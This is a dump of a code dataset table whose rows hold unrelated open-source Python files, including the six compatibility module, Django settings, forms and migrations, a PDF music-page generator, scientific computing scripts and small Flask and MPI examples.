text
stringlengths 6
947k
| repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
|
---|---|---|---|---|---|---|
"""Utilities for writing code that runs on Python 2 and 3"""
# Copyright (c) 2010-2013 Benjamin Peterson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import operator
import sys
import types
__author__ = "Benjamin Peterson <benjamin@python.org>"
__version__ = "1.2.0"
# True if we are running on Python 3.
PY3 = sys.version_info[0] == 3
if PY3:
string_types = str,
integer_types = int,
class_types = type,
text_type = str
binary_type = bytes
MAXSIZE = sys.maxsize
else:
string_types = basestring,
integer_types = (int, long)
class_types = (type, types.ClassType)
text_type = unicode
binary_type = str
if sys.platform.startswith("java"):
# Jython always uses 32 bits.
MAXSIZE = int((1 << 31) - 1)
else:
# It's possible to have sizeof(long) != sizeof(Py_ssize_t).
class X(object):
def __len__(self):
return 1 << 31
try:
len(X())
except OverflowError:
# 32-bit
MAXSIZE = int((1 << 31) - 1)
else:
# 64-bit
MAXSIZE = int((1 << 63) - 1)
del X
text_type_name = text_type().__class__.__name__
def _add_doc(func, doc):
"""Add documentation to a function."""
func.__doc__ = doc
def _import_module(name):
"""Import module, returning the module after the last dot."""
__import__(name)
return sys.modules[name]
class _LazyDescr(object):
def __init__(self, name):
self.name = name
def __get__(self, obj, tp):
result = self._resolve()
setattr(obj, self.name, result)
# This is a bit ugly, but it avoids running this again.
delattr(tp, self.name)
return result
class MovedModule(_LazyDescr):
def __init__(self, name, old, new=None):
super(MovedModule, self).__init__(name)
if PY3:
if new is None:
new = name
self.mod = new
else:
self.mod = old
def _resolve(self):
return _import_module(self.mod)
class MovedAttribute(_LazyDescr):
def __init__(self, name, old_mod, new_mod, old_attr=None, new_attr=None):
super(MovedAttribute, self).__init__(name)
if PY3:
if new_mod is None:
new_mod = name
self.mod = new_mod
if new_attr is None:
if old_attr is None:
new_attr = name
else:
new_attr = old_attr
self.attr = new_attr
else:
self.mod = old_mod
if old_attr is None:
old_attr = name
self.attr = old_attr
def _resolve(self):
module = _import_module(self.mod)
return getattr(module, self.attr)
class _MovedItems(types.ModuleType):
"""Lazy loading of moved objects"""
_moved_attributes = [
MovedAttribute("cStringIO", "cStringIO", "io", "StringIO"),
MovedAttribute("filter", "itertools", "builtins", "ifilter", "filter"),
MovedAttribute("input", "__builtin__", "builtins", "raw_input", "input"),
MovedAttribute("map", "itertools", "builtins", "imap", "map"),
MovedAttribute("reload_module", "__builtin__", "imp", "reload"),
MovedAttribute("reduce", "__builtin__", "functools"),
MovedAttribute("StringIO", "StringIO", "io"),
MovedAttribute("xrange", "__builtin__", "builtins", "xrange", "range"),
MovedAttribute("zip", "itertools", "builtins", "izip", "zip"),
MovedModule("builtins", "__builtin__"),
MovedModule("configparser", "ConfigParser"),
MovedModule("copyreg", "copy_reg"),
MovedModule("http_cookiejar", "cookielib", "http.cookiejar"),
MovedModule("http_cookies", "Cookie", "http.cookies"),
MovedModule("html_entities", "htmlentitydefs", "html.entities"),
MovedModule("html_parser", "HTMLParser", "html.parser"),
MovedModule("http_client", "httplib", "http.client"),
MovedModule("email_mime_multipart", "email.MIMEMultipart", "email.mime.multipart"),
MovedModule("email_mime_text", "email.MIMEText", "email.mime.text"),
MovedModule("email_mime_base", "email.MIMEBase", "email.mime.base"),
MovedModule("BaseHTTPServer", "BaseHTTPServer", "http.server"),
MovedModule("CGIHTTPServer", "CGIHTTPServer", "http.server"),
MovedModule("SimpleHTTPServer", "SimpleHTTPServer", "http.server"),
MovedModule("cPickle", "cPickle", "pickle"),
MovedModule("queue", "Queue"),
MovedModule("reprlib", "repr"),
MovedModule("socketserver", "SocketServer"),
MovedModule("tkinter", "Tkinter"),
MovedModule("tkinter_dialog", "Dialog", "tkinter.dialog"),
MovedModule("tkinter_filedialog", "FileDialog", "tkinter.filedialog"),
MovedModule("tkinter_scrolledtext", "ScrolledText", "tkinter.scrolledtext"),
MovedModule("tkinter_simpledialog", "SimpleDialog", "tkinter.simpledialog"),
MovedModule("tkinter_tix", "Tix", "tkinter.tix"),
MovedModule("tkinter_constants", "Tkconstants", "tkinter.constants"),
MovedModule("tkinter_dnd", "Tkdnd", "tkinter.dnd"),
MovedModule("tkinter_colorchooser", "tkColorChooser",
"tkinter.colorchooser"),
MovedModule("tkinter_commondialog", "tkCommonDialog",
"tkinter.commondialog"),
MovedModule("tkinter_tkfiledialog", "tkFileDialog", "tkinter.filedialog"),
MovedModule("tkinter_font", "tkFont", "tkinter.font"),
MovedModule("tkinter_messagebox", "tkMessageBox", "tkinter.messagebox"),
MovedModule("tkinter_tksimpledialog", "tkSimpleDialog",
"tkinter.simpledialog"),
MovedModule("urllib_robotparser", "robotparser", "urllib.robotparser"),
MovedModule("winreg", "_winreg"),
]
for attr in _moved_attributes:
setattr(_MovedItems, attr.name, attr)
del attr
moves = sys.modules[__name__ + ".moves"] = _MovedItems("moves")
def add_move(move):
"""Add an item to six.moves."""
setattr(_MovedItems, move.name, move)
def remove_move(name):
"""Remove item from six.moves."""
try:
delattr(_MovedItems, name)
except AttributeError:
try:
del moves.__dict__[name]
except KeyError:
raise AttributeError("no such move, %r" % (name,))
if PY3:
_meth_func = "__func__"
_meth_self = "__self__"
_func_code = "__code__"
_func_defaults = "__defaults__"
_iterkeys = "keys"
_itervalues = "values"
_iteritems = "items"
else:
_meth_func = "im_func"
_meth_self = "im_self"
_func_code = "func_code"
_func_defaults = "func_defaults"
_iterkeys = "iterkeys"
_itervalues = "itervalues"
_iteritems = "iteritems"
try:
advance_iterator = next
except NameError:
def advance_iterator(it):
return it.next()
next = advance_iterator
if PY3:
def get_unbound_function(unbound):
return unbound
Iterator = object
def callable(obj):
return any("__call__" in klass.__dict__ for klass in type(obj).__mro__)
else:
def get_unbound_function(unbound):
return unbound.im_func
class Iterator(object):
def next(self):
return type(self).__next__(self)
callable = callable
_add_doc(get_unbound_function,
"""Get the function out of a possibly unbound function""")
get_method_function = operator.attrgetter(_meth_func)
get_method_self = operator.attrgetter(_meth_self)
get_function_code = operator.attrgetter(_func_code)
get_function_defaults = operator.attrgetter(_func_defaults)
def iterkeys(d):
"""Return an iterator over the keys of a dictionary."""
return iter(getattr(d, _iterkeys)())
def itervalues(d):
"""Return an iterator over the values of a dictionary."""
return iter(getattr(d, _itervalues)())
def iteritems(d):
"""Return an iterator over the (key, value) pairs of a dictionary."""
return iter(getattr(d, _iteritems)())
if PY3:
def b(s):
return s.encode("latin-1")
def u(s):
return s
def compat_repr(object_repr):
return object_repr
if sys.version_info[1] <= 1:
def int2byte(i):
return bytes((i,))
else:
# This is about 2x faster than the implementation above on 3.2+
int2byte = operator.methodcaller("to_bytes", 1, "big")
import io
StringIO = io.StringIO
BytesIO = io.BytesIO
else:
def b(s):
return s
def u(s):
return unicode(s, "unicode_escape")
def compat_repr(object_repr):
# compat_repr is designed to return all reprs with leading 'u's
# inserted to make all strings look like unicode strings.
# This makes testing between py2 and py3 much easier.
result = ''
in_quote = False
curr_quote = None
for char in object_repr:
if char in ['"', "'"] and (
not curr_quote or char == curr_quote):
if in_quote:
# Closing quote
curr_quote = None
in_quote = False
else:
# Opening quote
curr_quote = char
result += 'u'
in_quote = True
result += char
return result
int2byte = chr
import StringIO
StringIO = BytesIO = StringIO.StringIO
_add_doc(b, """Byte literal""")
_add_doc(u, """Text literal""")
if PY3:
import builtins
exec_ = getattr(builtins, "exec")
def reraise(tp, value, tb=None):
if value.__traceback__ is not tb:
raise value.with_traceback(tb)
raise value
print_ = getattr(builtins, "print")
del builtins
else:
def exec_(code, globs=None, locs=None):
"""Execute code in a namespace."""
if globs is None:
frame = sys._getframe(1)
globs = frame.f_globals
if locs is None:
locs = frame.f_locals
del frame
elif locs is None:
locs = globs
exec("""exec code in globs, locs""")
exec_("""def reraise(tp, value, tb=None):
raise tp, value, tb
""")
def print_(*args, **kwargs):
"""The new-style print function."""
fp = kwargs.pop("file", sys.stdout)
if fp is None:
return
def write(data):
if not isinstance(data, basestring):
data = str(data)
fp.write(data)
want_unicode = False
sep = kwargs.pop("sep", None)
if sep is not None:
if isinstance(sep, unicode):
want_unicode = True
elif not isinstance(sep, str):
raise TypeError("sep must be None or a string")
end = kwargs.pop("end", None)
if end is not None:
if isinstance(end, unicode):
want_unicode = True
elif not isinstance(end, str):
raise TypeError("end must be None or a string")
if kwargs:
raise TypeError("invalid keyword arguments to print()")
if not want_unicode:
for arg in args:
if isinstance(arg, unicode):
want_unicode = True
break
if want_unicode:
newline = unicode("\n")
space = unicode(" ")
else:
newline = "\n"
space = " "
if sep is None:
sep = space
if end is None:
end = newline
for i, arg in enumerate(args):
if i:
write(sep)
write(arg)
write(end)
_add_doc(reraise, """Reraise an exception.""")
def with_metaclass(meta, base=object):
"""Create a base class with a metaclass."""
return meta("NewBase", (base,), {})
|
GbalsaC/bitnamiP
|
venv/lib/python2.7/site-packages/sure/six.py
|
Python
|
agpl-3.0
| 12,755 | 0.001803 |
import subprocess
from music21 import *
from pyPdf import PdfFileReader, PdfFileWriter
from reportlab.pdfgen import canvas
from reportlab.lib import pagesizes
from reportlab.lib.units import inch
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfbase.ttfonts import TTFont
# some important constants
MUSIC_XML_DIR = "C:\\wamp\\www\\syntaxblitz.github.io\\portfolio\\music-xml\\"
MUSIC_LY_DIR = "C:\\wamp\\www\\syntaxblitz.github.io\\portfolio\\music-ly\\"
MUSIC_PDF_DIR = "C:\\wamp\\www\\syntaxblitz.github.io\\portfolio\\music-pdf\\"
PAGENUM_PDF_DIR = "C:\\wamp\\www\\syntaxblitz.github.io\\portfolio\\pagenum-pdf\\"
PAGE_PDF_DIR = "C:\\wamp\\www\\syntaxblitz.github.io\\portfolio\\page-pdf\\"
OUTPUT_DIR = "C:\\wamp\\www\\syntaxblitz.github.io\\portfolio\\pdf-output\\"
PATH_TO_CAMBRIA = "C:\\Windows\\Fonts\\CAMBRIA.TTC"
LILYPOND_EXE_LOCATION = r"c:\Program Files (x86)\lilypond\usr\bin\lilypond.exe"
for i in range(-1, 43 + 1):
pageNum = i
pageNumber = str(pageNum)
numOfParts = 1
# generate .ly file in music21
music = converter.parse(MUSIC_XML_DIR + pageNumber + ".xml")
numOfParts = len(music.getElementsByClass(stream.Part))
music.write("lily", MUSIC_LY_DIR + pageNumber + ".ly")
# add styling information to .ly file
outFile = open(MUSIC_LY_DIR + pageNumber + ".ly", "a") # 'a' opens for appending
if numOfParts == 1:
outFile.write(file("ly-one-line.txt","r").read()) # 'r' opens for just reading
else:
outFile.write(file("ly-two-lines.txt","r").read()) # 'r' opens for just reading
outFile.close()
# turn .ly into .pdf
subprocess.call([ #will wait for finish exec
LILYPOND_EXE_LOCATION,
"-o", MUSIC_PDF_DIR,
MUSIC_LY_DIR + pageNumber + ".ly"
])
# merge pages and add page number:
musicLine = PdfFileReader(file(MUSIC_PDF_DIR + pageNumber + ".pdf", "rb"))
page = PdfFileReader(file(PAGE_PDF_DIR + pageNumber + ".pdf", "rb"))
page.getPage(0).mergePage(musicLine.getPage(0))
hexPageNumber = str(hex(pageNum))[2:].upper()
pageNumberPdfCanvas = canvas.Canvas(PAGENUM_PDF_DIR + pageNumber + ".pdf", pagesize=pagesizes.letter)
pdfmetrics.registerFont(TTFont("Cambria", PATH_TO_CAMBRIA))
pageNumberPdfCanvas.setFont("Cambria", 12)
if pageNum != -1: # title page is -1, and we don't want a page number there.
if pageNum % 2 == 0: # even pages are on left, so put text on right
widthOfText = pageNumberPdfCanvas.stringWidth(hexPageNumber, "Cambria", 12)
pageNumberPdfCanvas.drawString(inch * 8.5 - inch * .5 - widthOfText, inch * 11 - inch * .5, hexPageNumber)
else: # put number on left
pageNumberPdfCanvas.drawString(inch * .5, inch * 11 - inch * .5, hexPageNumber)
pageNumberPdfCanvas.showPage()
pageNumberPdfCanvas.save()
pageNumberPdf = PdfFileReader(file(PAGENUM_PDF_DIR + pageNumber + ".pdf", "rb"))
page.getPage(0).mergePage(pageNumberPdf.getPage(0))
output = PdfFileWriter()
output.addPage(page.getPage(0))
outStream = file(OUTPUT_DIR + pageNumber + ".pdf", "wb")
output.write(outStream)
outStream.close()
|
SyntaxBlitz/syntaxblitz.github.io
|
portfolio/pdf-scripts/do-page-generate.py
|
Python
|
mit
| 3,014 | 0.023557 |
# -*- coding: utf-8 -*-
import json
from axe.http_exceptions import BadJSON
def get_request(request):
return request
def get_query(request):
return request.args
def get_form(request):
return request.form
def get_body(request):
return request.data
def get_headers(request):
return request.headers
def get_cookies(request):
return request.cookies
def get_method(request):
return request.method
def get_json(headers, body):
content_type = headers.get('Content-Type')
if content_type != 'application/json':
return
data = body.decode('utf8')
try:
return json.loads(data)
except ValueError:
raise BadJSON
|
soasme/axe
|
axe/default_exts.py
|
Python
|
mit
| 680 | 0.011765 |
from protocols.forms import forms
from core.utils import TIME_UNITS
class DiscardForm(forms.VerbForm):
name = "Discard"
slug = "discard"
has_manual = True
layers = ['item_to_act','item_to_retain','conditional_statement','settify']
item_to_act = forms.CharField(required=False, label='item to discard')
item_to_retain = forms.CharField()
conditional_statement = forms.CharField(required = False, help_text ='if X happens, do Y')
min_time = forms.FloatField(required=False, help_text='this is the minimal time this should take', widget=forms.NumberInput(attrs={'step':'any'}))
max_time = forms.FloatField(required=False, widget=forms.NumberInput(attrs={'step':'any'}))
time_units = forms.ChoiceField(required=False, choices=TIME_UNITS, help_text='in seconds', initial = 'sec' )
time_comment = forms.CharField(required=False)
|
Bionetbook/bionetbook
|
bnbapp/protocols/forms/verbs/discard.py
|
Python
|
mit
| 870 | 0.018391 |
##############################################################################
# Copyright (c) 2000-2016 Ericsson Telecom AB
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Eclipse Public License v1.0
# which accompanies this distribution, and is available at
# http://www.eclipse.org/legal/epl-v10.html
#
# Contributors:
# Balasko, Jeno
# Delic, Adam
#
##############################################################################
import xml.etree.ElementTree as ET
tree = ET.parse('project_hierarchy_graph.xml')
root = tree.getroot()
f = open('project_hierarchy_graph.dot', 'w')
f.write("digraph PROJECT_HIERARCHY_GRAPH {\n")
for project in root:
for reference in project:
f.write(project.attrib['name'])
f.write(" -> ")
f.write(reference.attrib['name'])
f.write(";\n")
f.write("}\n")
f.close()
# use this to generate graph:
# > dot -Tpng project_hierarchy_graph.dot -o project_hierarchy_graph.png
|
BenceJanosSzabo/titan.core
|
etc/scripts/tpd_graph_xml2dot.py
|
Python
|
epl-1.0
| 978 | 0.005112 |
# Copyright 2018 - Nokia Networks.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_config import cfg
from oslo_log import log as logging
from mistral.rpc import base as rpc
from mistral.service import base as service_base
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
class SchedulerServer(service_base.MistralService):
"""Scheduler server.
Manages scheduler life-cycle and gets registered as an RPC
endpoint to process scheduler specific calls.
"""
def __init__(self, scheduler, setup_profiler=True):
super(SchedulerServer, self).__init__(
'scheduler_group',
setup_profiler
)
self.scheduler = scheduler
self._rpc_server = None
def start(self):
super(SchedulerServer, self).start()
self._rpc_server = rpc.get_rpc_server_driver()(cfg.CONF.engine)
self._rpc_server.register_endpoint(self)
self._rpc_server.run()
self._notify_started('Scheduler server started.')
def stop(self, graceful=False):
super(SchedulerServer, self).stop()
if self._rpc_server:
self._rpc_server.stop(graceful)
def schedule(self, rpc_ctx, job):
"""Receives requests over RPC to schedule delayed calls.
:param rpc_ctx: RPC request context.
:param job: Scheduler job.
"""
LOG.info("Received RPC request 'schedule'[job=%s]", job)
return self.scheduler.schedule(job, allow_redistribute=False)
|
openstack/mistral
|
mistral/scheduler/scheduler_server.py
|
Python
|
apache-2.0
| 2,019 | 0 |
class Foo(object):
def mm(self, barparam):
'''
@param barparam: this is barparam
'''
f = Foo()
f.mm(barparam=10)
|
aptana/Pydev
|
tests/com.python.pydev.refactoring.tests/src/pysrcrefactoring/reflib/renameparameter/methoddef2.py
|
Python
|
epl-1.0
| 145 | 0.006897 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.datetime_safe
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('topics', '0014_auto_20151218_1820'),
]
operations = [
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(primary_key=True, serialize=False, auto_created=True, verbose_name='ID')),
('text', models.TextField()),
('slug', models.TextField(unique=True)),
('pub_date', models.DateTimeField(default=django.utils.datetime_safe.datetime.now, verbose_name='date published')),
('user', models.ForeignKey(to=settings.AUTH_USER_MODEL, on_delete=models.CASCADE)),
],
),
migrations.RemoveField(
model_name='tags',
name='user',
),
migrations.AlterField(
model_name='link',
name='tags',
field=models.ManyToManyField(to='topics.Tag'),
),
migrations.DeleteModel(
name='Tags',
),
]
|
andychase/codebook
|
topics/migrations/0015_auto_20151218_1823.py
|
Python
|
mit
| 1,259 | 0.002383 |
# e Django settings for dss project.
import os
import mimetypes
from django.core.urlresolvers import reverse_lazy
import djcelery
from django.conf import global_settings
from dss import logsettings
from utils import here
from localsettings import *
from pipelinesettings import *
from storagesettings import *
from paymentsettings import *
DEVELOPMENT = DEBUG
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('Fergal Moran', 'fergal.moran@gmail.com'),
)
MANAGERS = ADMINS
AUTH_PROFILE_MODULE = 'spa.UserProfile'
ALLOWED_HOSTS = ['*']
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'deepsouthsounds',
'ADMINUSER': 'postgres',
'USER': DATABASE_USER,
'PASSWORD': DATABASE_PASSWORD,
'HOST': DATABASE_HOST,
}
}
import sys
if 'test' in sys.argv or 'test_coverage' in sys.argv:
print "Testing"
DATABASES['default']['ENGINE'] = 'django.db.backends.sqlite3'
ROOT_URLCONF = 'dss.urls'
TIME_ZONE = 'Europe/Dublin'
LANGUAGE_CODE = 'en-ie'
SITE_ID = 1
USE_I18N = False
USE_L10N = True
s = True
SITE_ROOT = here('')
ADMIN_MEDIA_PREFIX = STATIC_URL + "grappelli/"
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'compressor.finders.CompressorFinder',
'pipeline.finders.PipelineFinder',
'pipeline.finders.CachedFileFinder',
)
STATICFILES_STORAGE = 'pipeline.storage.PipelineCachedStorage'
STATICFILES_DIRS = (
here('static'),
)
TEMPLATE_CONTEXT_PROCESSORS = global_settings.TEMPLATE_CONTEXT_PROCESSORS + (
'django_facebook.context_processors.facebook',
'django.core.context_processors.request',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.contrib.auth.context_processors.auth',
"allauth.socialaccount.context_processors.socialaccount",
"allauth.account.context_processors.account",
"spa.context_processors.dss_context"
)
AUTHENTICATION_BACKENDS = global_settings.AUTHENTICATION_BACKENDS + (
"allauth.account.auth_backends.AuthenticationBackend",
)
MIDDLEWARE_CLASSES = (
'django.middleware.gzip.GZipMiddleware',
'django.middleware.common.CommonMiddleware',
'user_sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'spa.middleware.cors.XsSharingMiddleware',
# 'htmlmin.middleware.HtmlMinifyMiddleware',
#'htmlmin.middleware.MarkRequestMiddleware',
'django_user_agents.middleware.UserAgentMiddleware',
'pipeline.middleware.MinifyHTMLMiddleware',
# 'spa.middleware.uploadify.SWFUploadMiddleware',
#'spa.middleware.sqlprinter.SqlPrintingMiddleware' if DEBUG else None,
#'debug_toolbar.middleware.DebugToolbarMiddleware',
)
WSGI_APPLICATION = 'dss.wsgi.application'
TEMPLATE_DIRS = (here('templates'),)
INSTALLED_APPS = (
'grappelli',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'user_sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admindocs',
'django_facebook',
'django_extensions',
'django_gravatar',
'notification',
'djcelery',
'django_nose',
'sorl.thumbnail',
'south',
'pipeline',
'avatar',
'spa',
'spa.signals',
'core',
'dirtyfields',
'allauth',
'allauth.account',
'allauth.socialaccount',
'allauth.socialaccount.providers.facebook',
'allauth.socialaccount.providers.twitter',
'allauth.socialaccount.providers.google',
'debug_toolbar',
'django_jenkins',
'dbbackup',
'schedule',
'djrill',
'paypal.standard.ipn',
'django_user_agents',
'storages',
'rest_framework',
)
# where to redirect users to after logging in
LOGIN_REDIRECT_URL = reverse_lazy('home')
LOGOUT_URL = reverse_lazy('home')
LOGGING = logsettings.LOGGING
FACEBOOK_APP_ID = '154504534677009'
djcelery.setup_loader()
SOCIALACCOUNT_AVATAR_SUPPORT = True
SOCIALACCOUNT_PROVIDERS = {
'facebook': {
'SCOPE': ['email', 'publish_stream', 'publish_actions'],
'METHOD': 'oauth2',
'LOCALE_FUNC': lambda request: 'en_IE'
},
'google': {
'SCOPE': ['https://www.googleapis.com/auth/userinfo.profile'],
'AUTH_PARAMS': {'access_type': 'online'}
}
}
AVATAR_STORAGE_DIR = MEDIA_ROOT + '/avatars/'
ACCOUNT_LOGOUT_REDIRECT_URL = '/'
INTERNAL_IPS = ('127.0.0.1', '86.44.166.21', '192.168.1.111')
TASTYPIE_DATETIME_FORMATTING = 'rfc-2822'
TASTYPIE_ALLOW_MISSING_SLASH = True
SENDFILE_ROOT = os.path.join(MEDIA_ROOT, 'mixes')
SENDFILE_URL = '/media/mixes'
SESSION_ENGINE = 'user_sessions.backends.db'
mimetypes.add_type("text/xml", ".plist", False)
HTML_MINIFY = not DEBUG
DEFAULT_FROM_EMAIL = 'DSS ChatBot <chatbot@deepsouthsounds.com>'
DEFAULT_HTTP_PROTOCOL = 'http'
EMAIL_BACKEND = 'djrill.mail.backends.djrill.DjrillBackend'
if DEBUG:
import mimetypes
mimetypes.add_type("image/png", ".png", True)
mimetypes.add_type("image/png", ".png", True)
mimetypes.add_type("application/x-font-woff", ".woff", True)
mimetypes.add_type("application/vnd.ms-fontobject", ".eot", True)
mimetypes.add_type("font/ttf", ".ttf", True)
mimetypes.add_type("font/otf", ".otf", True)
REALTIME_HEADERS = {
'content-type': 'application/json'
}
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
if 'test' in sys.argv:
try:
from test_settings import *
except ImportError:
pass
REST_FRAMEWORK = {
# Use hyperlinked styles by default.
# Only used if the `serializer_class` attribute is not set on a view.
'DEFAULT_MODEL_SERIALIZER_CLASS':
'rest_framework.serializers.HyperlinkedModelSerializer',
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
]
}
#Trying this to see if it stops the user being logged out
SESSION_COOKIE_AGE = 60 * 60 * 24 * 7 * 2 # Age of cookie, in seconds (default: 2 weeks).
|
fergalmoran/dss
|
dss/settings.py
|
Python
|
bsd-2-clause
| 6,629 | 0.000905 |
#!/usr/bin/python
import os,sys,json,re
for dirpath,dirnames,filenames in os.walk("data/courts/us"):
indexPath = os.path.join(dirpath,"index.txt")
if not os.path.exists(indexPath):
print "Oops: %s" % indexPath
sys.exit()
fh = open(indexPath)
lines = []
template = None
firstContent = False
while 1:
line = fh.readline()
if not line: break
if line.find(':category-id:') > -1: continue
if line.find(':court-id:') > -1: continue
line = line.rstrip()
if not firstContent:
if not line: continue
firstContent = True
if line.startswith('.. category:: '):
template = ' :category-id: %s'
elif line.startswith('.. court:: '):
template = ' :court-id: %s'
lines.append(line)
fh.close()
if not template:
print "Ouch: %s" % indexPath
sys.exit()
id = ';'.join(dirpath.split("/")[2:])
lines = lines[0:1] + [template % id] + lines[1:]
txt = "\n".join(lines) + "\n"
print txt
#open(indexPath, "w+").write(txt)
|
fbennett/legal-resource-registry
|
attic/WALK-FILES.py
|
Python
|
bsd-2-clause
| 1,115 | 0.011659 |
#! /usr/bin/env python
from pySecDec.loop_integral import loop_package
import pySecDec as psd
li = psd.loop_integral.LoopIntegralFromPropagators(
propagators = ['k1**2-msq','(k1+p1+p2)**2-msq','k2**2-msq','(k2+p1+p2)**2-msq','(k1+p1)**2-msq','(k1-k2)**2','(k2-p3)**2-msq','(k2+p1)**2','(k1-p3)**2'],
powerlist = [1,1,0,1,1,1,1,0,0],
loop_momenta = ['k1','k2'],
replacement_rules = [
('p1*p1',0),
('p2*p2',0),
('p3*p3',0),
('p1*p2','s/2'),
('p2*p3','pp4/2-s/2-t/2'),
('p1*p3','t/2')
]
)
Mandelstam_symbols = ['s','t','pp4']
mass_symbols = ['msq']
loop_package(
name = 'elliptic2L_physical',
loop_integral = li,
real_parameters = Mandelstam_symbols + mass_symbols,
#additional_prefactor = '(s/msq)**(3/2)',
# the highest order of the final epsilon expansion --> change this value to whatever you think is appropriate
requested_order = 0,
# the optimization level to use in FORM (can be 0, 1, 2, 3, 4)
form_optimization_level = 2,
# the WorkSpace parameter for FORM
form_work_space = '100M',
# the method to be used for the sector decomposition
# valid values are ``iterative`` and ``geometric``
decomposition_method = 'iterative',
# if you choose ``geometric`` and 'normaliz' is not in your
# $PATH, you can set the path to the 'normaliz' command-line
# executable here
#normaliz_executable='/path/to/normaliz',
contour_deformation = True
)
|
mppmu/secdec
|
examples/elliptic2L_physical/generate_elliptic2L_physical.py
|
Python
|
gpl-3.0
| 1,518 | 0.049407 |
"""
# create a virtualenv
mkvirtualenv test_api
# install dependencies
pip install flask
pip install flasgger
# run the following script
python simple_test.py
"""
from flask import Flask, jsonify, request
from flasgger import Swagger
app = Flask(__name__)
Swagger(app)
@app.route("/recs", methods=['GET'])
def recs():
"""
A simple test API
This ednpoint does nothing
Only returs "test"
---
tags:
- testapi
parameters:
- name: size
in: query
type: string
description: size of elements
responses:
200:
description: A single user item
schema:
id: return_test
properties:
result:
type: string
description: The test
default: 'test'
"""
size = int(request.args.get('size', 1))
return jsonify({"result": "test" * size})
app.run(debug=True)
|
Navisite/flasgger
|
flasgger/simple_test.py
|
Python
|
mit
| 916 | 0.001092 |
import sys
import time
from mpi4py.futures import MPICommExecutor
x0 = -2.0
x1 = +2.0
y0 = -1.5
y1 = +1.5
w = 1600
h = 1200
dx = (x1 - x0) / w
dy = (y1 - y0) / h
def julia(x, y):
c = complex(0, 0.65)
z = complex(x, y)
n = 255
while abs(z) < 3 and n > 1:
z = z**2 + c
n -= 1
return n
def julia_line(k):
line = bytearray(w)
y = y1 - k * dy
for j in range(w):
x = x0 + j * dx
line[j] = julia(x, y)
return line
def plot(image):
import warnings
warnings.simplefilter('ignore', UserWarning)
try:
from matplotlib import pyplot as plt
except ImportError:
return
plt.figure()
plt.imshow(image, aspect='equal', cmap='cubehelix')
plt.axis('off')
try:
plt.draw()
plt.pause(2)
except:
pass
def test_julia():
with MPICommExecutor() as executor:
if executor is None: return # worker process
tic = time.time()
image = list(executor.map(julia_line, range(h), chunksize=10))
toc = time.time()
print("%s Set %dx%d in %.2f seconds." % ('Julia', w, h, toc-tic))
if len(sys.argv) > 1 and sys.argv[1] == '-plot':
plot(image)
if __name__ == '__main__':
test_julia()
|
mpi4py/mpi4py
|
demo/futures/run_julia.py
|
Python
|
bsd-2-clause
| 1,252 | 0.00639 |
from uuid import uuid4
from django.contrib.admin.sites import AdminSite
from django.contrib.auth.models import User, Group
from django.test import RequestFactory
from txtalert.core.clinic_admin import VisitAdmin, PatientAdmin
from txtalert.core.models import Visit, Clinic, Patient
from txtalert.core.tests.base import BaseTxtAlertTestCase
class ClinicAdminTestCase(BaseTxtAlertTestCase):
model_class = None
model_admin_class = None
def setUp(self):
self.admin_user = User.objects.create_superuser(
'admin', 'admin@admin.com', password='admin')
self.clinic1_group = Group.objects.create(name='clinic group 1')
self.clinic1_user = User.objects.create_user(
'clinic1', 'clinic1@clinic1.com', password='clinic1')
self.clinic1_user.groups = [self.clinic1_group]
self.clinic1_user.save()
self.clinic1 = Clinic.objects.create(
name='Clinic 1', user=self.clinic1_user, te_id=uuid4().hex)
self.clinic2_group = Group.objects.create(name='clinic group 2')
self.clinic2_user = User.objects.create_user(
'clinic2', 'clinic2@clinic2.com', password='clinic2')
self.clinic2_user.groups = [self.clinic2_group]
